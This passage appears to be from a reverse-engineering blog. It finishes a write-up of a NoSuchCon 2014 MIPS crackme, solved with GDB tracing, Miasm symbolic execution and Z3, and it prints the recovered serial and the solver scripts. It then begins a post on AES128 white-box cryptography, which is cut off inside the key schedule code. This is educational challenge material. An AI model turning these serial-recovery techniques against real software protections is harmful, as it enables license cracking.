  x.mem[start_addr +   8] == 0x20766974, x.mem[start_addr +  12] == 0x534e202b, 
  x.mem[start_addr +  16] == 0x203d2043, x.mem[start_addr +  20] == 0x5d20333c,
)

print '> Solving..'
if s.check() == sat:
  print '> Constraints solvable, here are the 6 DWORDs:'
  m = s.model()
  for i in (a, b, c, d, e, f):
    print ' %r = 0x%.8X' % (i, m[i].as_long())

  print '> Serial:', ''.join(('%.8x' % m[i].as_long())[::-1] for i in (a, b, c, d, e, f)).upper()
else:
  print '! Constraints unsolvable'
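Two small details of that snippet are worth spelling out: what the six target constants are, and what the [::-1] in the last print does. The sketch below assumes little-endian byte order (the target is mipsel); the helper names are mine.

```python
import struct

def dwords_to_ascii(dwords):
    '''Pack each DWORD as little-endian bytes and decode the result as ASCII.'''
    return b''.join(struct.pack('<I', d) for d in dwords).decode('ascii')

def dwords_to_serial(dwords):
    '''Same transformation as the final print: each DWORD is rendered as
    8 hex digits, the digit string is reversed, and everything is upper-cased.'''
    return ''.join(('%.8x' % d)[::-1] for d in dwords).upper()

# The six constants used in the solver constraints
targets = [0x7953205b, 0x6b63616e, 0x20766974,
           0x534e202b, 0x203d2043, 0x5d20333c]
expected_text = dwords_to_ascii(targets)   # '[ Synacktiv + NSC = <3 ]'

example = dwords_to_serial([0x12345678])   # '87654321'
```

So the constraints ask for the six output DWORDs to spell a 24-character message in memory, and the serial is simply the solved input DWORDs with their hex digits reversed.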

There we are, the final moment; drum roll

PS D:\Codes\NoSuchCon2014> python .\solve_nsc2014_step1_z3.py
==================================================
Tests OK -- you are fine to go
==================================================
> Instantiating the symbolic execution engine..
> Generating dynamically the code of the son & reorganizing/cleaning it..
> Configuring the virtual environement..
> Running the code..
> Instantiating & configuring the solver..
> Solving..
> Constraints solvable, here are the 6 DWORDs:
  a = 0xFE446223
  b = 0xBA770149
  c = 0x75BA5111
  d = 0x78EA3635
  e = 0xA9D6E85F
  f = 0xCC26C5EF
> Serial: 322644EF941077AB1115AB575363AE87F58E6D9AFE5C62CC
==================================================

overclok@wildout:~/chall/nsc2014$ ./start_vm.sh
[    0.000000] Initializing cgroup subsys cpuset
[...]
Debian GNU/Linux 7 debian-mipsel ttyS0

debian-mipsel login: root
Password:
[...]
root@debian-mipsel:~# /home/user/crackmips 322644EF941077AB1115AB575363AE87F58E6D9AFE5C62CC
good job!
Next level is there: http://nsc2014.synacktiv.com:65480/oob4giekee4zaeW9/

Boom :-).

Alternative solution

In this part, I present an alternate solution to solve the challenge. It's somewhat of a shortcut, since it requires much less coding than Axel's one, and uses the awesome Miasm framework.

Shortcut #1 : Tracing the parent with GDB

Quick recap of the parent's behaviour

As Axel has previously explained, the first step is to recover the child's execution flow. Because of nanomites, the child is driven by the parent; we have to analyze the parent (i.e. the debug function) first to determine the correct sequence of the child's pc values.

The parent's main loop is obfuscated, but by browsing cross-references of stack variables in IDA, we can see where each one is used. After a bit of analysis, we can try to decompile the algorithm by hand, and write a pseudo-Python description of what the debug function does (it is really simplified):

counter = 0
waitpid()

while(True):
    regs = ptrace(GETREGS)

    # big block 1
    addr = regs.pc
    param = f(counter)
    addr = obfu1(addr, param)

    for i in range(606):  # 6 rounds * 101 entries
        entry = pcs[i]  # entry is 8 bytes long (2 dwords)
        if(addr == entry.first_dword):
            addr = entry.second_dword
            break

    # big block 2
    addr = obfu2(addr, param)

    regs.pc = addr
    ptrace(SETREGS, regs)
    counter += 1

    if(not waitpid()):
        break

The "big blocks" are the two long assembly blocks preceding and following the inner loop. Without looking at the gory details, we understand that a param value is derived from the counter using a function that I call f, and then used to obfuscate the original child's pc. The result is then looked up in a pcs array (stored at address 0x414130), the next dword is extracted and used in a 2nd obfuscation pass to finally produce the new pc value injected into the child.

The most important fact here is that this process does not involve the input key at any time. The output pc sequence is deterministic and constant; two executions with two different keys will produce the same sequence of pc's. Since we know the first value of pc (the first break instruction at 0x40228C), we can theoretically compute the correct sequence and then reorder the child's instructions according to this sequence.

We have two approaches for doing so:

  • static analysis: somehow understand each instruction used in obfuscation passes and rewrite the algorithm producing the correct sequence. This is the path followed by Axel.
  • dynamic analysis: trace the program once and log all pc values.

Although the first one is probably the most interesting, the second is certainly the fastest. Again, it only works because the input key does not influence the output pc sequence. And we're lucky: the child is already debugged by the parent, but nothing prevents us from debugging the parent itself.

First attempt at tracing

Tracing is pretty straightforward with GDB using breakpoints and commands. In order to understand the parent's algorithm a bit better, I first wrote a pretty verbose GDB script that prints the loop counter, the param variable, as well as the original and new child's pc for each iteration. I chose to put two breakpoints:

  • The first one at the end of the first obfuscation block (0x401440)
  • The second one before the ptrace call at the end of the second block (0x0401D8C), in order to be able to read the child's pc manipulated by the parent.

Here is the script:

##################################
# A few handy functions
##################################

def print_context_pc
    printf "regs.pc = 0x%08x\n", *(int*)($fp-0x1cc)
end

def print_param
    printf "param = 0x%08x\n", *(int*)($fp-0x2f0)
end

def print_addr
    printf "addr = 0x%08x\n", *(int*)($fp-0x2fc)
end

def print_counter
    printf "counter = %d\n", *(int*)($fp-0x300)
end

##################################

set pagination off
set confirm off
file crackmips
# gdbserver address
target remote 127.0.0.1:4444

# break at the end of block 1
b *0x401440
commands
silent
printf "\nNew round\n"
print_counter
print_context_pc
print_param 
print_addr
c
end

# break before the end of block 2
b *0x0401D8C
commands
silent
print_context_pc
c
end

c

To run that script within GDB, we first need to start crackmips with gdbserver in our qemu VM. After a few minutes, we get the following (cleaned) trace:

New round
counter = 0
regs.pc = 0x0040228c
param = 0x00000000
addr = 0xcd0e9f0e
regs.pc = 0x00402290

New round
counter = 1
regs.pc = 0x004022bc
param = 0x00000000
addr = 0xcd0e99ae
regs.pc = 0x00402ce0

New round
counter = 2
regs.pc = 0x00402d0c
param = 0x00000000
addr = 0xcd0e420e
regs.pc = 0x00402da8

[...]

By reading the trace further, we realize that param is always equal to counter/101. This is actually the child's own loop counter, since its big loop is made of 101 pseudo basic blocks. We also notice that the pc sequence is different for each child's loop: round 0 is not equal to round 101, etc.

Getting a clean trace

Since we're only interested in the final pc value for each round, we can make a simpler script that just outputs those values, organized in a parsable format so that we can use them later in another script. Here is version 2 of the script:

def print_context_pc
    printf "0x%08x\n", *(int*)($fp-0x1cc)
end

set pagination off
set confirm off
file crackmips
target remote 127.0.0.1:4444

# break before the end of block 2
b *0x0401D8C
commands
silent
print_context_pc
c
end

c

The cleaned trace only contains the 606 pc values, one on each line:

0x00402290
0x00402ce0
0x00402da8
0x00403550
[...]
0x004030e4
0x004039dc
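Such a trace is trivial to load back into Python. The sketch below is only an illustration (function names are mine, and the sample holds just the first four values shown above): it parses one hexadecimal value per line and groups the result into rounds of 101 blocks.

```python
def parse_pc_trace(text):
    '''Return the pc values of a trace that has one 0x-prefixed value per line.
    Anything else (blank lines, GDB chatter) is ignored.'''
    pcs = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('0x'):
            pcs.append(int(line, 16))
    return pcs

def split_rounds(pcs, blocks_per_round=101):
    '''Group the pc values into consecutive rounds of blocks_per_round entries.'''
    return [pcs[i:i + blocks_per_round]
            for i in range(0, len(pcs), blocks_per_round)]

sample = '0x00402290\n0x00402ce0\n0x00402da8\n0x00403550\n'
sample_pcs = parse_pc_trace(sample)
```

On the full trace, split_rounds should return 6 lists of 101 start addresses, one list per iteration of the child's loop.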

Mission 1: accomplished!

Shortcut #2 : Symbolic execution using Miasm

We now have the list of each start address of each basic block executed by the child. The next step is to understand what each one of them does, and reorder them to reproduce the whole algorithm.

Even though writing a symbolic execution engine from scratch is certainly a fun and interesting exercise, I chose to play with Miasm. This excellent framework can disassemble binaries in various architectures (among which x86, x64, ARM, MIPS, etc.), and convert them into an intermediate language called IR (intermediate representation). It is then able to perform symbolic execution on this IR in order to find the side effects of a basic block on registers and memory locations. Although there is not much documentation, Miasm contains various examples that should make the API easier to dig into. Don't tell me that it is hard to install, it is really not (well, I haven't tried on Windows ;). And there is even a docker image, so you have no excuse to not try it!

Miasm symbolic execution 101

Before scripting everything, let's first see how to use Miasm to perform symbolic execution of one basic block. For the sake of simplicity, let's work on the first basic block of the child's main loop.

from miasm2.analysis.machine import Machine
from miasm2.analysis import binary

bi = binary.Container("crackmips")
machine = Machine('mips32l')
mn, dis_engine_cls, ira_cls = machine.mn, machine.dis_engine, machine.ira

First, we open the crackme using the generic Container class. It automatically detects the executable format and uses Elfesteem to parse it. Then we use the handy Machine class to get references to useful classes we'll use to disassemble and analyze the binary.

BB_BEGIN = 0x00402290
BB_END = 0x004022BC

# Disassemble between BB_BEGIN and BB_END
dis_engine = dis_engine_cls(bs=bi.bs)
dis_engine.dont_dis = [BB_END]
bloc = dis_engine.dis_bloc(BB_BEGIN)
print '\n'.join(map(str, bloc.lines))

Here, we disassemble a single basic block, by explicitly telling Miasm its start and end address. The disassembler is created by instantiating the dis_engine_cls class. bi.bs represents the binary stream we are working on. I admit the dont_dis syntax is a bit weird; it is used to tell Miasm to stop disassembling when it reaches a given address. We do it here because the next instruction is a break, and Miasm does not normally think it is the end of a basic block. When you run those lines, you should get this output:

LW         V1, 0x38(FP)
SLL        V0, V1, 0x2
ADDIU      A0, FP, 0x18
ADDU       V0, A0, V0
LW         A0, 0x8(V0)
LW         V0, 0x38(FP)
SUBU       A0, A0, V0
SLL        V0, V1, 0x2
ADDIU      V1, FP, 0x18
ADDU       V0, V1, V0
SW         A0, 0x8(V0)

Okay, so we know how to disassemble a block with Miasm. Let's now see how to convert it into the Intermediate Representation:

# Transform to IR
ira = ira_cls()
irabloc = ira.add_bloc(bloc)[0]
print '\n'.join(map(lambda b: str(b[0]), irabloc.irs))

We instantiated the ira_cls class and called its add_bloc method. It takes a basic block as input and outputs a list of IR basic blocs; here we know that we'll get only one, so we use [0]. Let's see the output of those lines:

V1 = @32[(FP+0x38)]
V0 = (V1 << 0x2)
A0 = (FP+0x18)
V0 = (A0+V0)
A0 = @32[(V0+0x8)]
V0 = @32[(FP+0x38)]
A0 = (A0+(- V0))
V0 = (V1 << 0x2)
V1 = (FP+0x18)
V0 = (V1+V0)
@32[(V0+0x8)] = A0
IRDst = loc_00000000004022BC:0x004022bc

Each of those lines is an instruction in Miasm's IR language. It is pretty easy: each instruction is described as a list of the side-effects it has on some variables, using expressions and assignments. @32[...] represents a 32-bit memory access; when it's on the left of an = sign it's a write access, when it's on the right it's a read. The last line uses the pseudo-register IRDst, which is kind of the IR's pc register. It tells Miasm where the next basic block is located.
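To make the semantics of these IR lines concrete, here is a minimal sketch in plain Python (no Miasm involved) that replays the eleven assignments on concrete 32-bit values. The run_block helper, the register dictionary and the sample values for FP, the index and the memory cell are all hypothetical, chosen only for illustration.

```python
MASK = 0xFFFFFFFF  # keep every value on 32 bits, like the MIPS registers


def run_block(regs, mem):
    """Replay the IR assignments listed above on concrete values.

    regs maps register names to integers, mem maps addresses to 32-bit words.
    """
    def load(addr):
        return mem.get(addr & MASK, 0)

    regs["V1"] = load(regs["FP"] + 0x38)
    regs["V0"] = (regs["V1"] << 0x2) & MASK
    regs["A0"] = (regs["FP"] + 0x18) & MASK
    regs["V0"] = (regs["A0"] + regs["V0"]) & MASK
    regs["A0"] = load(regs["V0"] + 0x8)
    regs["V0"] = load(regs["FP"] + 0x38)
    regs["A0"] = (regs["A0"] - regs["V0"]) & MASK
    regs["V0"] = (regs["V1"] << 0x2) & MASK
    regs["V1"] = (regs["FP"] + 0x18) & MASK
    regs["V0"] = (regs["V1"] + regs["V0"]) & MASK
    mem[(regs["V0"] + 0x8) & MASK] = regs["A0"]


# Hypothetical initial state: a frame pointer, the index stored at FP+0x38,
# and one word stored at FP+0x20+4*index.
FP = 0x7FFF0000
index = 3
cell = FP + 0x20 + 4 * index
regs = {"FP": FP, "V0": 0, "V1": 0, "A0": 0}
mem = {FP + 0x38: index, cell: 0x1000}

run_block(regs, mem)
print(hex(mem[cell]))
```

With these made-up values, the only memory cell that changes is the one at FP+0x20+4*index, and it is decreased by the index. That is exactly what the symbolic execution will tell us, but for every possible input at once.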

Great! Let's see now how to perform symbolic execution on this IR basic block.

from miasm2.expression.expression import *
from miasm2.ir.symbexec import symbexec
from miasm2.expression.simplifications import expr_simp

# Prepare symbolic execution
symbols_init = {}
for i, r in enumerate(mn.regs.all_regs_ids):
    symbols_init[r] = mn.regs.all_regs_ids_init[i]

# Perform symbolic exec
sb = symbexec(ira, symbols_init)
sb.emulbloc(irabloc)

mem, exprs = sb.symbols.symbols_mem.items()[0]
print "Memory changed at %s :" % mem
print "\tbefore:", exprs[0]
print "\tafter:", exprs[1]

The first lines initialize the symbol pool used for symbolic execution. We then use the symbexec module to create an execution engine, and we give it our fresh IR basic block. The result of the execution is readable by browsing the attributes of sb.symbols. Here I am mainly interested in the memory side-effects, so I use symbols_mem.items() to list them. symbols_mem is actually a dict whose keys are the memory locations that changed during execution, and whose values are pairs containing both the previous value that was in that memory cell and the new one. There's only one change, and here it is:

Memory changed at (FP_init+(@32[(FP_init+0x38)] << 0x2)+0x20) :
  before: @32[(FP_init+(@32[(FP_init+0x38)] << 0x2)+0x20)]
  after: (@32[(FP_init+(@32[(FP_init+0x38)] << 0x2)+0x20)]+(- @32[(FP_init+0x38)]))

The expressions are getting a bit more complex, but are still pretty readable. FP_init represents the value of the fp register at the beginning of execution. We can clearly see that a memory location was modified: a value was subtracted from it. But we can do better: we can give Miasm simplification rules in order to make this output much more readable. Let's do it!

# Simplifications
fp_init = ExprId('FP_init', 32)
zero_init = ExprId('ZERO_init', 32)
e_i_pattern = expr_simp(ExprMem(fp_init + ExprInt32(0x38), 32))
e_i = ExprId('i', 32)
e_pass_i_pattern = expr_simp(ExprMem(fp_init + (e_i << ExprInt32(2)) + ExprInt32(0x20), 32))
e_pass_i = ExprId("pwd[i]", 32)

simplifications = {e_i_pattern      : e_i,
                    e_pass_i_pattern : e_pass_i,
                    zero_init        : ExprInt32(0) }

def my_simplify(expr):
    expr2 = expr.replace_expr(simplifications)
    return expr2

print "%s = %s" % (my_simplify(exprs[0]) ,my_simplify(exprs[1]))

Here we declare 3 replacement rules:

  • Replace @32[(FP_init+0x38)] with i
  • Replace @32[(FP_init+(i << 0x2)+0x20)] with pwd[i]
  • Replace ZERO_init with 0 (although it is not really useful here)

There is actually a more generic way to do it using pattern matching rules with jokers, but we don't really need this machinery here. This is the result we get after simplification:

pwd[i] = (pwd[i]+(- i))

That's all! So all this basic block does is a subtraction. What is nice is that the output is actually valid Python code :). This will be very useful in the last part.
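Since the simplified output is valid Python, it can be executed directly. The following is a small sketch of that idea, assuming a made-up pwd list and index (both hypothetical); the only extra step is wrapping the result back to 32 bits, because Python integers are unbounded.

```python
MASK = 0xFFFFFFFF

# The line below is copied from the simplified output shown above.
generated_line = "pwd[i] = (pwd[i]+(- i))"

# Hypothetical concrete state, for illustration only.
state = {"pwd": [0x11111111, 0x22222222, 0x33333333], "i": 2}

# Run the generated statement with `state` providing the names pwd and i.
exec(generated_line, {}, state)

# Python integers never overflow, so truncate to 32 bits by hand.
state["pwd"][2] &= MASK

print(hex(state["pwd"][2]))
```

This is the same trick the solver script relies on later, except that the names pwd and i will then be bound to Z3 bit-vectors instead of plain integers.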

Generating the child's algorithm

So in less than 60 lines, we were able to disassemble an arbitrary basic block, perform symbolic execution on it and get a pretty understandable result. We just need to apply this logic to the 100 remaining blocks, and we'll have a pythonic version of each one of them. Then, we simply reorder them using the GDB trace we got from the previous part, and we'll be able to generate 606 python lines describing the whole algorithm.

Here is an extract of the script automating all of this:

def load_trace(filename):
    return [int(x.strip(), 16) for x in open(filename).readlines()]

def boundaries_from_trace(trace):
    bb_starts = sorted(set(trace))
    boundaries = [(bb_starts[i], bb_starts[i+1]-4) for i in range(len(bb_starts)-1)]
    boundaries.append((0x4039DC, 0x04039E8)) # last basic bloc, added by hand
    return boundaries

def exprs2str(exprs):
    return ' = '.join(str(e) for e in exprs)

trace = load_trace("gdb_trace.txt")
boundaries = boundaries_from_trace(trace)

print "# Building IR blocs & expressions for all basic blocks"
bb_exprs = []
for zone in boundaries:
    bb_exprs.append(analyse_bb(*zone))

print "# Reconstructing the whole algorithm based on GDB trace"
bb_starts = [x[0] for x in boundaries]
for bb_ea in trace:
    bb_index = bb_starts.index(bb_ea)
    #print "%x : %s" % (bb_ea, exprs2str(bb_exprs[bb_index]))
    print exprs2str(bb_exprs[bb_index])

The analyse_bb() function performs symbolic execution on a single basic block, given its start and end addresses. It just wraps what we've been doing so far into a function. The GDB trace is opened and parsed, and a list of basic block addresses is built from it (we cheat a little bit for the last one of the loop, by hardcoding it). Each basic block is analyzed and the resulting expressions are pushed into the bb_exprs list. Then the GDB trace is processed, by outputting the expressions corresponding to each basic block.
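To illustrate how the block boundaries are derived from the trace, here is a minimal stand-alone sketch of the same heuristic. The function name boundaries_from_addresses, the insn_size parameter and the sample trace are assumptions made for the example; only the first address comes from the block studied earlier.

```python
def boundaries_from_addresses(trace, insn_size=4):
    """Derive (start, end) pairs from a list of executed block addresses.

    Each block is assumed to end one instruction before the next known
    block start, which is the heuristic used in the extract above.
    """
    starts = sorted(set(trace))
    return [(starts[k], starts[k + 1] - insn_size)
            for k in range(len(starts) - 1)]


# Hypothetical trace: 0x402290 is the block analysed earlier,
# the other addresses are made up for the example.
trace = [0x402290, 0x4022C0, 0x402290, 0x4022E4]
bounds = boundaries_from_addresses(trace)

for start, end in bounds:
    print("%08x -> %08x" % (start, end))
```

Note that the highest address in the trace never gets an end address with this approach, since there is no following block to subtract from. This is why the script has to add the last basic block by hand.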

This is what we get:

# Building IR blocs & expressions for all basic blocks
# Reconstructing the whole algorithm based on GDB trace
pwd[i] = (pwd[i]+(- i))
pwd[i] = ((0x0|pwd[i])^0xFFFFFFFF)
pwd[i] = (pwd[i]^i)
pwd[i] = (pwd[i]^i)
pwd[i] = (pwd[i]+0x3ECA6F23)
pwd[i] = (pwd[i]+0x6EDC032)
[...]
pwd[i] = ((pwd[i] << 0x14)|(pwd[i] >> 0xC))
pwd[i] = ((pwd[i] << ((i+0x1)&0x1F))|(pwd[i] >> ((((0x0|i)^0xFFFFFFFF)+0x20)&0x1F)))
i = (i+0x1)

Solving with Z3

Okay, so now we have a Python (and even C ;) file describing the operations performed on the 6 dwords containing the input key. We could try to bruteforce it, but using a constraint solver is much more elegant and faster. I also chose Z3 because it has nice Python bindings. And since its expression syntax is mostly compatible with Python, we just need to add a few things to our generated file!

from z3 import *
import struct

solution_str = "[ Synacktiv + NSC = <3 ]"
solutions = struct.unpack("<LLLLLL", solution_str)
N = len(solutions)

# Hook Z3's `>>` so it works with our algorithm
# (logical shift instead of arithmetic one)
BitVecRef.__rshift__  = LShR

pwd = [BitVec("pwd_%d" % i, 32) for i in range(N)]
pwd_orig = [pwd[i] for i in range(N)]
i = 0

# paste here all the generated algorithm from previous part
# BEGIN ALGO
pwd[i] = (pwd[i]+(- i))
pwd[i] = ((0x0|pwd[i])^0xFFFFFFFF)
# [...]
pwd[i] = ((pwd[i] << ((i+0x1)&0x1F))|(pwd[i] >> ((((0x0|i)^0xFFFFFFFF)+0x20)&0x1F)))
i = (i+0x1)
# END ALGO

s = Solver()

for i in range(N):
    s.add(pwd[i] == solutions[i])

assert s.check() == sat

m = s.model()
sol_dw = [m[pwd_orig[i]].as_long() for i in range(N)]
key = ''.join(("%08x" % dw)[::-1].upper() for dw in sol_dw)

print "KEY = %s" % key

We've declared the valid solution and the list of six 32-bit variables (pwd), pasted the algorithm, and run the solver. We just need to be careful with the >> operation, since Z3 treats it as an arithmetic shift, and we want a logical one. So we replace it with a dirty hook.
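To see why the kind of shift matters, here is a small sketch in plain Python (no Z3 needed) that models both shifts on 32-bit values and applies them to the rotation pattern found in the generated algorithm. The helper names lshr32, ashr32 and rotl20 and the sample value are hypothetical.

```python
MASK = 0xFFFFFFFF


def lshr32(x, n):
    """Logical right shift: the vacated high bits are filled with zeros."""
    return (x & MASK) >> n


def ashr32(x, n):
    """Arithmetic right shift: the sign bit (bit 31) is replicated."""
    x &= MASK
    if x & 0x80000000:
        x -= 1 << 32  # reinterpret as a negative two's-complement value
    return (x >> n) & MASK


def rotl20(x, shr):
    """The generated `(x << 0x14) | (x >> 0xC)` pattern, with a pluggable >>."""
    return ((x << 0x14) | shr(x, 0xC)) & MASK


x = 0x80000001  # hypothetical value with the sign bit set
print(hex(rotl20(x, lshr32)))
print(hex(rotl20(x, ashr32)))
```

With the logical shift, the expression is a genuine 20-bit left rotation. With the arithmetic one, the replicated sign bits pollute the upper part of the result as soon as bit 31 is set, so the solver would be working on a different algorithm than the one in the binary.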

The solution should come almost instantly:

$ python sample_solver.py
KEY = 322644EF941077AB1115AB575363AE87F58E6D9AFE5C62CC

Alternative solution - conclusion

I chose this solution not only to get acquainted with Miasm, but also because it required much less effort and pain :). It fits into approximately 20 lines of GDB script, and 120 lines of Python using Miasm and Z3. You can find all of those in this folder. I hope it gave you an understandable example of symbolic execution and what you can do with it. However, I strongly encourage you to dig into Miasm's code and examples if you really want to understand what's going on under the hood.

War's over, the final words

I guess this is where I thank both @elvanderb for this really cool challenge and @synacktiv for letting him write it :-). Emilien and I also hope you enjoyed the read, feel free to contact any of us if you have any remarks/questions/whatever.

Also, special thanks to @__x86 and @jonathansalwan for proofreading!

The code, traces and tools developed in this post are all available on github here and here!

By the way, don't hesitate to contact a member of the staff if you have a cool post you would like to see here -- you too can end up in doar-e's wall of fame :-).

Spotlight on an unprotected AES128 white-box implementation

Introduction

I think it all began when I worked on the NSC2013 crackme made by @elvanderb; long story short, you had a heavily obfuscated AES128 white-box implementation to break. The thing was you could actually solve the challenge in different ways:

  1. the first one was the easiest one: you didn't need to know anything about white-box, crypto or even AES ; you could just see the function as a black-box & try to find "design flaws" in its inner-workings
  2. the elite way: this one involved understanding & recovering the entire design of the white-box, then identifying design weaknesses that allow the challenger to directly attack & recover the encryption key. A really nice write-up has recently been written by @doegox, check it out, really :): Oppida/NoSuchCon challenge.

The annoying thing is that there is not a lot of understandable C code available on the web that implements such things; nevertheless you do have quite a few nice academic references, and they are a really good resource to build your own.

This post aims to present briefly, in a simple way, what an AES white-box looks like, and to show how important its design is if you do not want your encryption key extracted :). The implementation I'm going to talk about today is not my creation at all, I just followed the first part (might do another post talking about the second part? Who knows) of a really nice paper (even for non-mathematical / crypto guys like me!) written by James A. Muir.

The idea is simple: we will start from a clean AES128 encryption function in plain C, then modify it & transform it into a white-box implementation in several steps. As usual, all the code is available on my github account; you are encouraged to break & hack it!

Of course, we will use this post to briefly present what white-box cryptography is, what its goals are & why it's kind of cool.

AES128

Introduction

All right, here we are: this part is just a reminder of how AES (with a 128-bit key) roughly works. If you know that already, feel free to go to the next level. Basically in here I just want us to build our first function: a simple block encryption. The signature of the function will be, as you expect, something like this:

void aes128_enc_base(unsigned char in[16], unsigned char out[16], unsigned char key[16])

The encryption works in eleven rounds; the first and the last are slightly different from the nine others, but they all rely on four operations: AddRoundKey, SubBytes, ShiftRows and MixColumns. (FIPS-197 counts this as an initial AddRoundKey step followed by ten rounds; it is the same sequence.) Each round modifies a 128-bit state with a 128-bit round-key. Those round-keys are generated from the encryption key by a key expansion function (called the key schedule). Note that the first round-key is actually the encryption key.

The first part of an AES encryption is to execute the key schedule in order to get our round-keys ; once we have them all it's just a matter of using the four different operations we saw to generate the encrypted plain-text.

I quite like to see how crypto algorithms work in a visual way; if that is also your case, check this SWF animation (no exploit in here, don't worry :)): Rijndael_Animation_v4_eng.swf ; otherwise you can also read the FIPS-197 document.

Key schedule

The key schedule is like the most important part of the algorithm. As I said a bit earlier, this function is a derivation one: it takes the encryption key as input and will generate the round-keys the encryption process will use as output.

I don't really feel like explaining in detail how it works (as it is a bit tricky to explain that with words), I would rather advise you to read the FIPS document or to follow the flash animation. Here is what my key schedule looks like:

// aes key schedule
#include <stddef.h> // size_t
#include <string.h> // memcpy
const unsigned char S_box[] = { 0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, 0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0, 0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15, 0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75, 0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84, 0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF, 0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8, 0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, 0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, 0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, 0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79, 0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08, 0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A, 0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E, 0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF, 0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16 };
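#define DW(x) (*(unsigned int*)(x))
// ROT is not defined in this listing; this definition is inferred from the
// "Rotate `d` 8 bits to the right" comment below (assumes a 32-bit unsigned int)
#define ROT(x) (((x) >> 8) | ((x) << 24))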
void aes128_enc_base(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
    unsigned int d;
    unsigned char round_keys[11][16] = { 0 };
    const unsigned char rcon[] = { 0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 